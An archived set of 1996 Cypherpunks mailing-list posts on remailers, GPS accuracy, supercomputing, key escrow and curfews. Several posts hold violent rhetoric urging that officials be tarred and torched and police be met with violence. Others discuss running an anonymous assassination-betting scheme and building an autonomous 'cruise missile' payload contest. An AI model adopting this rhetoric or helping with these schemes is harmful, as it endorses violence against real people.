> One unfortunate result of only using hashed names and not
> readable names is that it doesn't help the current remailer operators,
> since their existing code doesn't work that way.

This seems like a straightforward replacement for a small piece
of code in Lance Cotrell's mixmaster (which remains to be written, of
course :-). It's probably not hard to plug the same code into other
remailers if they're well-written.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 30 Sep 1996 03:05:41 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: crypto anarchy vs AP
Message-ID: <199609291655.JAA28141@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:21 PM 9/29/96 +0200, Gary Howland wrote:
>jim bell wrote:
>>  
>> On a related issue, GPS (global-positioning system) contains a de-accurizing
>> mis-feature called S/A, which adds a little error to the location as
>> detected by a receiver.  Ostensibly, it was added so that this could be
>> turned on in wartime, to deny the enemy the ability to make 10-meter fixes.
>> Turns out that it was kept on all the time, probably because if it WASN'T it
>> would become politically impossible to de-accurize the system even in wartime.
>
>Apparently S/A (selective availability) was turned *off* during the Gulf
>war.  "Military Intelligence" in action.

Yes, because of lack of enough S/A-capable military receivers... They were 
stuck with using the commercial, off-the-shelf kind.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Sep 1996 03:36:14 +0800
To: cypherpunks@toad.com
Subject: The Petaflops Boondoggle Computer (was PET_ard)
In-Reply-To: <199609291316.NAA15248@pipe4.ny2.usa.pipeline.com>
Message-ID: <v03007805ae7465749829@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


(Hoist by their own petards indeed! Don't tell our Russian what petard means.)

At 1:16 PM +0000 9/29/96, John Young wrote:
>   Sci, 20 Sept 1996:
>
>   "Redefining the Supercomputer"
>
>      The word is petaflops, computer jargon for 1000
>      trillion computations per second. Think of it as a
>      year's labor for a powerful workstation compressed
>      into 30 seconds. Think of it, also, as 1000 times the
>      speed of the current computing benchmark, a trillion
>      operations a second --  teraflops -- which is on the
...

I doubt this will be ever be built, at least not as a government-funded
"G-job" "one-off" machine. It would, as the full article state, necessitate
a kind of "Apollo program" for supercomputers.

This, as funding for mega-projects fades. This, as Cray Computer went
bankrupt, as Thinking Machines went into Chapter 11 and only recently
emerged as a pale shadow of its former self (concentrating on software
only), and as Floating Point Systems, NCube, MasPar, etc. are foundering.
(Actually, some have already been absorbed into other companies, and in
many cases, dissolved. I think FPS was absorbed...)

(I could go on...Elxsi, Denelcor, Steve Chen's supercomputer company,
Control Data Corporation (pulled the plug on its supercomputers years ago),
etc. Probably two dozen companies have tried to enter the "next generation
supercomputer" business....)

Cray Research (not to be confused with Cray Computer, of course) is now a
unit of Silicon Graphics. And my old employer, Intel, is now struggling
with its "Supercomputer" business unit (which was once doing moderately
well, and was even the performance leader for a while, but which is now
being scaled back....)

The reasons for the collapse of the market are well-known: the end of
communism has lessened certain needs, the cut-backs in defense spending,
"the attack of the killer micros" (arrays of cheap micros give better
bang-for-the-buck), and, related to the themes of this list, NSA's
code-breaking just ain't what it used to be.

To wit, if even a petaflops machine, costing billions of dollars and
needing a nuclear power plant to power it, cannot make headway on cracking
a garden-variety PGP-encrypted message.....

(I grant that computers, supercomputers, workstations, arrays of
special-purpose hardware, etc. are useful for all sorts of related things,
such as signals analysis, filtering of voices, recognition of voices,
traffic analysis, etc. But I rather doubt that a single petaflops machine
is a good way to go for this.)

The "speculative" applications--the "miraworld" simulation environment, for
example--are nonsensical. There is no reason for a multibillion dollar
petaflops machine to be built so that researchers can schedule a few
minutes on it! (They'd rather have 0.1% the peak performance, but constant
or assured access, I'm sure.)

And so on. I don't see it happening.

--Tim May





We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Sep 1996 03:20:44 +0800
To: cypherpunks@toad.com
Subject: Use of Consumer-grade GPS units in Gulf War
In-Reply-To: <199609281729.KAA05451@mail.pacifier.com>
Message-ID: <v03007806ae746a3db7ef@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:21 PM +0200 9/29/96, Gary Howland wrote:
>jim bell wrote:
>>
>> On a related issue, GPS (global-positioning system) contains a de-accurizing
>> mis-feature called S/A, which adds a little error to the location as
>> detected by a receiver.  Ostensibly, it was added so that this could be
>> turned on in wartime, to deny the enemy the ability to make 10-meter fixes.
>> Turns out that it was kept on all the time, probably because if it WASN'T it
>> would become politically impossible to de-accurize the system even in
>>wartime.
>
>Apparently S/A (selective availability) was turned *off* during the Gulf
>war.  "Military Intelligence" in action.

Actually, there were excellent reasons.

First, there was no evidence the Iraqis had any ability to use GPS of any
sort (I suspect the odd unit existed in Iraq, but not enough of them to be
useful in any meaningful sense.)

Second, the military bought a huge pile of _consumer_-grade GPS units,
e.g., from Trimble Navigation, to fill a shortage of military-grade units
(because of the rapid build-up in ground forces).

The reasons for turning off S/A made perfect sense.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 30 Sep 1996 04:01:49 +0800
To: tcmay@buckeye.got.net
Subject: GPS and other Dual-use technologies
Message-ID: <v02130502ae740149c98b@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


I used to be an avid RC modeler and have contemplated organizing an
on-going amateur cruise missile contest.  The object would be to accurately
deliver various payload weights over courses of various terrain and
distances (perhaps out to a hundred miles or more in the case of Giant
Scale craft).  Judging would be based on speed, stealth (noise, IR
emissions and radar cross section) and accuracy.

Craft are free to use any navigational technology, but must be autonomous
from launch to delivery.  To aid navigation I was considering the design of
a substitute differential GPS beacon functionally interchangable with those
offered by the USCG.  My device would work on a different frequency,
possibly using very wideband direct sequence spread spectrum (for low
probability of intercept/detection) and be actuated by the missile as it
neared the target in order to refine its position.

-- Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear             | Internet: azur@netcom.com
Lamarr Labs              | Voice: 1-702-658-2654
7075 West Gowan Road     | Fax: 1-702-658-2673
Suite 2148               |
Las Vegas, NV 89129      |
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 30 Sep 1996 05:25:22 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: The Petaflops Boondoggle Computer (was PET_ard)
Message-ID: <199609291850.LAA03605@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 AM 9/29/96 -0800, Timothy C. May wrote:
>(Hoist by their own petards indeed! Don't tell our Russian what petard means.)

Uh, wasn't that the name of the bald captain on Star Trek Next Generation?  
You know, "Jean-Luc Petard"?

>>      The word is petaflops, computer jargon for 1000
>>      trillion computations per second. Think of it as a
>>      year's labor for a powerful workstation compressed
>>      into 30 seconds. Think of it, also, as 1000 times the
>>      speed of the current computing benchmark, a trillion
>>      operations a second --  teraflops -- which is on the
>...
>
>I doubt this will be ever be built, at least not as a government-funded
>"G-job" "one-off" machine. It would, as the full article state, necessitate
>a kind of "Apollo program" for supercomputers.

Check out an article in about the September issue of Scientific American, 
1966, on the subject of the Illiac IV, which was one of the first attempts 
at a multiprocessor machine.  Originally it was conceived as a 256-processor 
unit, at 4 million (floating point?) operations per second per processor 
which would have been 1 giga ops per second, but it was eventually built as 
a 64-processor unit and turned on in about 1972 or so.  The succeeding 
factor-of-1000 improvement appears (if the item above is accurate) to have 
taken  24 years to accomplish, so it's hard to imagine that the next factor 
of 1000 will arrive appreciably sooner than year 2020.


>The reasons for the collapse of the market are well-known: the end of
>communism has lessened certain needs, the cut-backs in defense spending,
>"the attack of the killer micros" (arrays of cheap micros give better
>bang-for-the-buck), and, related to the themes of this list, NSA's
>code-breaking just ain't what it used to be.

Oddly enough, however, we're getting somewhat of an echo of the "big single 
processor" phenomenon with the micros.  We all know that in supercomputers, 
multiprocessors won out over single processors, and mainframes were just 
about defeated by microcomputers. 

Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz 
chip for about $135, while they sell a 200-megahertz version for around $550 
or so.   Arithmetic suggests that a person would be far better off with a 
4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single, 
200-megahertz version.  (admittedly, peripheral logic costs will adjust this 
a little.)   Of course, this would also leave Intel flat on its ass 
attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed 
per cpu is just about the only advantage they have.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 30 Sep 1996 05:33:17 +0800
To: jimbell@pacifier.com
Subject: Re: crypto anarchy vs AP
In-Reply-To: <199609281729.KAA05451@mail.pacifier.com>
Message-ID: <199609291053.LAA00388@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Bell <jimbell@pacifier.com> writes:
> At 02:06 PM 9/26/96 -0500, snow wrote:
> >Adam Back <aba@dcs.ex.ac.uk> wrote:
> >> [...]
> >> More specifically perhaps they would disconnect key backbones, and
> >> ISPs briefly while they rushed into effect a few presidential decrees
> >> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets,
> >> etc.)
> >
> >     This would be cutting their own throats. There is SO much commercial
> >and government traffic going across "The Net" that many businesses would 
> >scream bloody murder, and the government would have MASSIVE trouble with 
> >it's agenda.
> 
> Yes, that "they'll cut off the Internet!" talk doesn't seem to be very 
> practical.  Society very quickly develops dependency on inventions.  Try to 
> take away their computers and they'd scream; take away their telephone and 
> it'd be worse!  Give Internet another couple of years and 50% of big 
> business would be severely impacted should it be cut off.  Wait five years 
> and the world would practically stop rotating without Internet.

Maybe so.  However I suggested that they would more likley outlaw non
GAK crypto, anonymous ecash, remailers, PGP, etc.

Perhaps I should read your later AP essay in case you have already
countered my practicality objections. (Do you have AP on the www
somewhere?),

We've seen people suggest that you couldn't get away with AP, by
claiming that the gambling was legal.  (They'd get you for interstate
gambling, conspiracy probably other things).

So, it seems to me that your only approach is to do the whole thing
anonymously.  That requires anonymous ecash (payee and payor
anonymous).  This means that the anonymous ecash bank will be shutdown
by the government as soon as it becomes apparent what is going on.

Remailer operators are similar soft targets.

The best you could do I think is this.  Publish a PGP public key, and
software or specifications for a robust steganographic encoding for AP
bets.

That would take care of comunication.

You still have the ecash problem.  What do you suggest?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 30 Sep 1996 05:35:04 +0800
To: tcmay@buckeye.got.net
Subject: Re: GPS and other Dual-use technologies
Message-ID: <199609291915.MAA04736@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:34 AM 9/29/96 -0700, Steve Schear wrote:
>I used to be an avid RC modeler and have contemplated organizing an
>on-going amateur cruise missile contest.  The object would be to accurately
>deliver various payload weights over courses of various terrain and
>distances (perhaps out to a hundred miles or more in the case of Giant
>Scale craft).  Judging would be based on speed, stealth (noise, IR
>emissions and radar cross section) and accuracy.
>
>Craft are free to use any navigational technology, but must be autonomous
>from launch to delivery.  To aid navigation I was considering the design of
>a substitute differential GPS beacon functionally interchangable with those
>offered by the USCG.  My device would work on a different frequency,
>possibly using very wideband direct sequence spread spectrum (for low
>probability of intercept/detection) and be actuated by the missile as it
>neared the target in order to refine its position.

The data standard for differential corrections is called "RTCM-104", and 
it's the signal you input into differential-capable GPS receivers.  Boxes to 
generate RTCM-104 are probably relatively cheap, primarily needing a 
multi-channel GPS receiver and another processor for coding.  Differential 
corrections can, of course, be transmitted on any frequency you'd like, 
including frequency-hopping if you're really concerned about intercept.  
(which you won't be...)

Incidentally, GPS receivers are getting REALLY small these days, 
particularly for just the module-level products.  A size like about 1 inch 
by 2-inches is pretty close to state-of-the-art.  Power consumption is about 
3/4 watt.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Sep 1996 05:38:14 +0800
To: cypherpunks@toad.com
Subject: Re: The Petaflops Boondoggle Computer (was PET_ard)
In-Reply-To: <199609291850.LAA03605@mail.pacifier.com>
Message-ID: <v03007800ae74868b0325@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:50 AM -0800 9/29/96, jim bell wrote:
>At 10:00 AM 9/29/96 -0800, Timothy C. May wrote:
>>(Hoist by their own petards indeed! Don't tell our Russian what petard
>>means.)
>
>Uh, wasn't that the name of the bald captain on Star Trek Next Generation?
>You know, "Jean-Luc Petard"?

Picard. To keep people out of suspense, "hoist by one's own petard" has one
etymology involving a lift-off by gaseous action (though the more
family-oriented dictionaries cite a petard as a French rocket of some sort,
ignoring the point that the name comes from this same gaseus emission).

>Check out an article in about the September issue of Scientific American,
>1966, on the subject of the Illiac IV, which was one of the first attempts
>at a multiprocessor machine.  Originally it was conceived as a 256-processor
>unit, at 4 million (floating point?) operations per second per processor
>which would have been 1 giga ops per second, but it was eventually built as
>a 64-processor unit and turned on in about 1972 or so.  The succeeding
>factor-of-1000 improvement appears (if the item above is accurate) to have
>taken  24 years to accomplish, so it's hard to imagine that the next factor
>of 1000 will arrive appreciably sooner than year 2020.

I agree. By the way, I knew some of the folks who worked on parts of the
Illiac-IV, which was still limping along as late as the late 70s (maybe
later). It suffered, as expected, from lack of robust software. Not a huge
incentive to write decent software when there's only a single machine!

(The Livermore S1 project was yet another such example. So was the CDC
Star, of approximately the same vintage as the Illiac.)


>Oddly enough, however, we're getting somewhat of an echo of the "big single
>processor" phenomenon with the micros.  We all know that in supercomputers,
>multiprocessors won out over single processors, and mainframes were just
>about defeated by microcomputers.
>
>Yet a look at Intel's pricing for Pentiums shows that they sell a 120-MHz
>chip for about $135, while they sell a 200-megahertz version for around $550
>or so.   Arithmetic suggests that a person would be far better off with a
>4-120-MHz-processor Pentium (cumulative clock rate 480 MHz) than a single,
>200-megahertz version.  (admittedly, peripheral logic costs will adjust this
>a little.)   Of course, this would also leave Intel flat on its ass
>attempting to compete with AMD, Cyrix, etc, because a somewhat higher speed
>per cpu is just about the only advantage they have.

Intel is having no problem at all competing with AMD and Cyrix! Both of
them are struggling---AMD just announced a layoff, and Cyrix is facing
financial troubles. Neither are able to make competitive parts, for reasons
I won't go into here, and neither are making the money they'll need to
compete in the future with Intel. (Intel has half a dozen billion-dollar
wafer fabs, running with extraordinarily high yields--so my sources tell me
:-})--and the more money they make, the more factories they build, the more
they learn about how to make 0.35 and 0.25 micron chips, etc.)

As to pricing, that's mostly a market issue. They charge what the market
will bear. As to why a 200 MHz chip sells for 3-4x what a 120 MHz chip
sells for, this is a matter of supply-and-demand and _system_ costs. When
someone is already spending, say, $2000 on a system, they'll usually pay an
extra $500 for a faster version. (Approximately. Again, the market is the
ultimate arbiter.)

Symmetric multiprocessing is available, but it's often much less hassle to
have a single CPU running at 200 MHz than to try games with multiple
processors (which means more PCB real estate, more sockets, more of other
things).

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Sep 1996 05:54:39 +0800
To: cypherpunks@toad.com
Subject: Re: Key-Escrow
In-Reply-To: <960929141327_113858214@emout06.mail.aol.com>
Message-ID: <v03007801ae7489ecce4b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:13 PM -0400 9/29/96, Scottauge@aol.com wrote:
>I have a question.
>
>There seems to be a lot of excitement over the key escrow stuff da gubermint
>is trying to install.
>
>Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these
>are like, gonna be my keys.

This has been discussed many times, even very recently. You don't think key
registration will be _free_, do you? Not many licenses are.

(Ignoring the issue of 10^200 being a lot more than there are particles in
the Universe, now estimated to be 10^75 elementary particles.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Mon, 30 Sep 1996 06:02:49 +0800
To: "Timothy C. May" <tcmay@sybase.com>
Subject: Re: Utah as a Religious Police State
Message-ID: <9609291929.AA04064@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


I guess that depends on your definition of liberty.  The Mormons
originally moved there to have a place to practice their religion,
and have freedom from persecution.  I suppose one could extend that 
to wanting a place to have the freedom to have a set of rules consistant
with their beliefs.  Should that include freedom from interferance from
folks such as yourself who want to change their rules, even though
you're not presently effected?

     Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: tcmay @ got.net ("Timothy C. May") @ smtp
Date: 09/28/96 10:35:42 PM
Subject: Utah as a Religious Police State

Hey, Attila, let me know where you folks live...I may want to move there!

At 2:56 AM +0000 9/29/96, attila wrote:

>        the population base is changing with an influx of non-Mormons
>    in town, so R rated are showing up at the theatres and video
>    rentals in town.

Just so long as my DSS dish still works in Utah--hey, I'll invite all the
jack Mormons over for tomorrow night's showing of "Inside Janine," on the
"Playboy Channel." (The "Playboy Channel" is kind of tame by video rental
standards, but more crotch shots than we used to see a couple of years ago.)

>        the police visible prescence is effective --a force of 50+ for
>    a population base < 25,000, plus the county sherrif cars and the
>    state police.   Curfew is 10pm weekdays for minors --and they
>    enforce it, big time.  midnight Fri/Sat.

They enforce the "curfew" big time?

Looks like some Mormon pigs need to be zapped.

(My kids don't cotton to no cop telling them when they can be out in public
and when they can't. Any cop who tries to stop my kids from being out has
earned severe retaliation. Any councilmember or state legislator who voted
for such a curfew needs to be hog-tied, covered with tar, then torched.)

I guess this is why I wouldn't last very long in Mormon Country. A fascist
encampment, it sounds like.

(I have no problem with Mormons, or Catholics, or Muslims, or Satanists
keeping _their own_ children indoors after 7, or 5, or whatever their Holy
Hour or Curfew Hour is, but no fucking religious nuts are going to tell
_me_ when _my_ children must be indoors. I determine where my children may
be, and I don't need the State's permission for them to be out. I would
think anyone with an iota of libertarian sentiment would understand this.)

>        ...idle hands are the devil's workshop. you want good solid
>    kids, you start from the gate and keep 'em busy: home, neighbors,
>    school, church, etc.

Do Utah's cops also enforce this law, too?


>            they do not date until they are 16 --in groups.  boys and
>    girls --the same rules.

With the Utah State Police enforcing this "dating curfew"?


(I may sound harsh here, but "curfew" means one and only one thing to me:
somebody restricting my freedom of those of my children to be a public
place. Should one of my children be picked up by cops for doing nothing
illegal, save for being "out past curfew," I'd consider violent response to
be justified. It sounds to me--not that I ever thought otherwise--that Utah
is not a land that favors liberty.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 29 Sep 1996 22:58:47 +0800
To: cypherpunks@toad.com
Subject: PET_ard
Message-ID: <199609291316.NAA15248@pipe4.ny2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Sci, 20 Sept 1996: 
 
   "Redefining the Supercomputer" 
 
      The word is petaflops, computer jargon for 1000 
      trillion computations per second. Think of it as a 
      year's labor for a powerful workstation compressed 
      into 30 seconds. Think of it, also, as 1000 times the 
      speed of the current computing benchmark, a trillion 
      operations a second --  teraflops -- which is on the 
      verge of becoming a reality at Sandia National 
      Laboratories after 5 years of effort. Now the federal 
      government's high-performance computing program is 
      aiming for a petaflops, and researchers are exploring 
      new technologies, sketching new architectures, and 
      pondering the software challenge of harnessing this 
      staggering computational power. 
 
      The NSA is a petaflops enthusiast, says a researcher, 
      but "we're not allowed to think about their 
      applications." 
 
   ----- 
 
   http://jya.com/petard.txt  (20 kb) 
 
   PET_ard 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 30 Sep 1996 06:48:54 +0800
To: cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
In-Reply-To: <9609291929.AA04060@notesgw2.sybase.com>
Message-ID: <v03007802ae74939813f4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



(I received this message, with "cypherpunks@sybase.com" as well as
"tcmay@sybase.com" (???) cc:ed, so I assume this message was intended for
the Cypherpunks list, with some sybase domain name weirdness, or reflector,
going on.)

At 12:30 PM -0400 9/29/96, Ryan Russell/SYBASE wrote:
>I guess that depends on your definition of liberty.  The Mormons
>originally moved there to have a place to practice their religion,
>and have freedom from persecution.  I suppose one could extend that
>to wanting a place to have the freedom to have a set of rules consistant
>with their beliefs.  Should that include freedom from interferance from
>folks such as yourself who want to change their rules, even though
>you're not presently effected?

Well, if Utah can rig a way to _secede_ from the Union, your arguments
would make more sense. But so long as they are part of these United States,
their religious beliefs about when children should be at home cannot
supersede basic liberties.

(There are some thorny issues about whether _minors_ have full civil
rights. But I certainly know that _my_ civil rights are being affected when
my children are not allowed on the streets after some hour. If my child is
out, this is my problem. I neither want cops to stop-and-detain my
children, nor do I want my tax monies to be used to control the behavior of
other people's children. Providing no crimes are being committed, curfews
for the sake of controlling the behavior of children are no more just than
would be a bunch of related behavior control laws, e.g., a ban on comic
books, a mandate that all children join after-school youth leagues, etc.)

As for "changing their rules," you're missing the point. There are
presumably many in Utah who believe as I do (maybe even some Mormons).
Those who are living in Utah, as renters, owners, whatever, should not be
bound by unconstitutional rules, no matter how many Mormon Elders favor
them. Unless the Mormons own _all_ of the property (and maybe not even
then, as renters have civil rights), they cannot impose their own notions
of morality on the rest of the population, except in compelling cases
(e.g., involving the well-known actual _crimes_).

I don't mean to pick on Mormons, as other communities have also attempted
to impose curfews and other restricitions on the children of others. My ire
was raised by Attila's enthusiastic support for laws which no
freedom-loving person should be enthusiastic about. Again, I have no
problem with Attila restricting his own children's movements, or joining
with other parents to control the behavior of their _own_ children, via
religious camps, religious schools, youth leagues, etc. He can even make
his own kids wear funny uniforms, funny religious hats, whatever.

But, for example, tellling _me_ when _my_ children may be out on public
streets (doing nothing illegal, neither robbing nor spray-painting nor
committing any other real crimes) is unacceptable.

I urge Attila (and others) to rethink enthusiastic support for curfews.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 30 Sep 1996 05:00:25 +0800
To: Adamsc <Adamsc@io-online.com>
Subject: [RANT] Re: Workers, Public Schools, Tradesmen, and Justice
In-Reply-To: <19960929055435234.AAA224@GIGANTE>
Message-ID: <Pine.BSF.3.91.960929130435.13454A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> The old way was that your HS provided what the mythical average person needed
> to go about life. College was for the more "complex" careers.

Perhaps "high school" should end at age 16, with two years of publicly
funded "junior college" or "technical school" available to those who
select one or the other, and qualify. This would bring an adult-level
decision earlier in life, and students would need to start thinking about
which path to chose at about 14. Perhaps this would allow reality to set
in at an earlier age. A high school diploma has become meaningless anyway 
- it is viewed as a "right."   

This wouldn't leave anyone condemned to a life of menial labor for a
decision made at age 16 - there are plenty of successful people who have
obtained a G.E.D. later in life, and then gone on to college. It would, 
however, give some measure of responsibility to the near-adult.

In my own education, I found that I was getting nothing out of high school
by age 16. I wanted to drop out of high school to start college, but my
parents wouldn't hear of it. I got into an internship-for-credit program
instead, and got out w/ diploma and started college a semester later. My
fiance did drop out of high school at age 16 and started college, with her
parent's blessing. All her high school guidence counselor could come up 
with was "But she'll miss her prom"! 

It seemed that the last two years of high school were devoted to trying 
to drag marginal, apathetic students towards their diploma, kicking and 
screaming. Anyone "college bound" was just marking time.

I wouldn't want my children subjected to this - I'd rather they got into 
college as soon as they were ready, diploma or not.

Just my $.02

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scottauge@aol.com
Date: Mon, 30 Sep 1996 05:01:29 +0800
To: cypherpunks@toad.com
Subject: Key-Escrow
Message-ID: <960929141327_113858214@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


I have a question.

There seems to be a lot of excitement over the key escrow stuff da gubermint
is trying to install.

Couldn't one burn off maybe 10 ** 200 keys and say, hey gubermint dude, these
are like, gonna be my keys.

Wouldn't this place them into a brute force search if they wanted to play
with your info?

Doing this will likely add to the tax burden for all dem disk drives needed
to store them numbers. :(

If ya can't do that, then they must be gonna sell key space like da radio
spectrm - which means some number is gonna mean something to someone
somewhere - yum yum say the hackers and the crackers.

I'm thinking there will be a way no matter what happens....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 30 Sep 1996 07:54:43 +0800
To: Donald Weightman <dweightman@radix.net>
Subject: Re: Internet 'terrorism' newsclips  [CYPHER, but news]
Message-ID: <v02130503ae7437287184@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>>There were more than 250,000 attacks on Department of Defense computers last
>>year, and 65% were successful. Little is known about who launched them,
>why, or
>>what they found. In a recent test, Defense Department "red teams" admit to
>>intentionally hacking into 18,200 systems, with only 5% of the attacks
>>detected; only 27% of those attacks were reported.
>
>Wonder if the timing of these stories has anything to do with the end of
>term legislative push on wiretapping.

Quite possibly.  The message from this article is clear.  Step up
investigation and prosecution of illegal government Net activities :-)

-- Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Mon, 30 Sep 1996 08:23:33 +0800
To: cypherpunks@toad.com
Subject: Does any body know anything about this?
Message-ID: <199609292138.OAA27616@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Is this just more snakeoil or is this real?

<<<<<<<< FORWARDED MESSAGE >>>>>>>>
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
Date: Fri, 20 Sep 1996 09:05:28 +0100
Subject: Seminar in Cryptology and Computer Security

                         ***   ***   ***   ***   ***


                  University of Cambridge Computer Laboratory

                                EXTRA SEMINAR

SPEAKER:        Matt Blaze
                AT&T Research

DATE:           Monday 23rd September 1996 at 11.30 am

PLACE:          Room TP4, Computer Laboratory

TITLE:          SYMMETRIC-KEY CIPHERS BASED ON HARD PROBLEMS

A useful principle in cipher design is to reduce or at least relate
closely the cryptanalysis of the cipher to some long-studied problem
that is believed to be difficult.  Most public-key ciphers follow this
principle fairly closely (e.g., RSA is at least similar to factoring).
Modern symmetric-key ciphers, on the other hand, can rarely be reduced
in this way and so are frequently designed specifically to resist the
various known cryptanalytic attacks.  In this informal talk, we examine
a simple cipher primitive, based on Feistel networks, for which recovery
of its internal state given its inputs and outputs is NP-complete.  We
outline simple and efficient block- and stream- cipher constructions
based on this primitive.

                        *       *       *

The regular Michaelmas term seminar series will resume on the 8th
October with a series of talks on Tuesday afternoons at 4.15 PM in room 
TP4, Computer Laboratory, Pembroke Street, Cambridge. A list of speakers
will be circulated shortly.

                        *       *       *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Myers W. Carpenter" <bmcarpenter@trevecca.edu>
Date: Mon, 30 Sep 1996 06:27:12 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Re: Making Remailers Widespread
In-Reply-To: <199609290623.XAA25627@dfw-ix3.ix.netcom.com>
